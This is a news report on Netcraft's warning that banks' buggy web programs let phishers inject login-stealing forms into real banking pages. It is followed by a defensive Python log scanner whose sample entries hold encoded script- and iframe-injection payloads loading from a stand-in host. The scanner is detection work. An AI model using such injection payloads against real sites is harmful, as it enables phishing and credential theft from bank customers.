Web consultant Netcraft has warned that many large banks
are neglecting to take sufficient care with the development and
testing of their online banking facilities, and as a result are
leaving their customers open to phishing attacks.

Netcraft said, "Well known banks have created an infestation of
application bugs and vulnerabilities across the internet, allowing
fraudsters to insert their data collection forms into bona fide
banking sites, and creating convincing frauds that are undetectable
to most customers."

Netcraft said its concerns about the continued threat of
phishing attacks on customers of big banks were triggered by a
large number of reports on the scams from users of its security
toolbar, which automatically detects new security threats.

Netcraft said its Toolbar recently blocked a phishing attack on
an online bank in which the fraudsters composed and mass-mailed a
phishing mail that exploited a program on the bank’s website.

In the attack, JavaScript served from the attackers' server
presented the bank's customers with a page bearing the bank's URL
in the address bar, while the browser window displayed a form sent
by the attackers' server asking for user login information.
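
A defender-side check for the pattern described above, added here as an example and not taken from Netcraft or the bank involved: it scans request targets from a web access log for parameter values that embed markup loading content from a host the bank does not control. The hostnames, parameter names, sample log entries, and the assumption that the injected markup arrives in a query-string value are all constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: hostnames the bank legitimately serves content from.
TRUSTED_HOSTS = {"bank.example", "www.bank.example"}

# Markup that pulls in or posts to a URL: <script src=>, <iframe src=>, <form action=>.
LOADER = re.compile(
    r"""<\s*(script|iframe|form)\b[^>]*?\b(?:src|action)\s*=\s*["']?\s*((?:https?:)?//[^\s"'>]+)""",
    re.IGNORECASE,
)

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (double-encoded input is common)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def foreign_loaders(request_target):
    """Return (parameter, tag, host) for every query value that embeds markup
    referencing a host outside TRUSTED_HOSTS."""
    findings = []
    for name, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        for tag, url in LOADER.findall(decode_fully(value)):
            host = urlsplit(url).hostname or ""
            # Markup in a parameter is odd even for a trusted host; this check
            # only reports the case the article describes: a foreign server.
            if host not in TRUSTED_HOSTS:
                findings.append((name, tag.lower(), host))
    return findings

# Constructed request targets, as they would appear in a web access log.
SAMPLE_TARGETS = [
    "/search?q=savings+rates",
    "/locator?city=%3Cscript%20src%3D%22http%3A%2F%2Fcollector.example%2Ff.js%22%3E%3C%2Fscript%3E",
    "/help?topic=%253Ciframe%2520src%253D%2F%2Fcollector.example%2Flogin%253E",
    "/page?w=%3Cscript%20src%3D%22https%3A%2F%2Fwww.bank.example%2Fapp.js%22%3E",
]

if __name__ == "__main__":
    for target in SAMPLE_TARGETS:
        for name, tag, host in foreign_loaders(target):
            print(f"ALERT param={name} tag=<{tag}> loads from {host}: {target}")
```

A hit means the site was asked to echo foreign markup; whether the page actually rendered it depends on the output encoding of the program that handled the request.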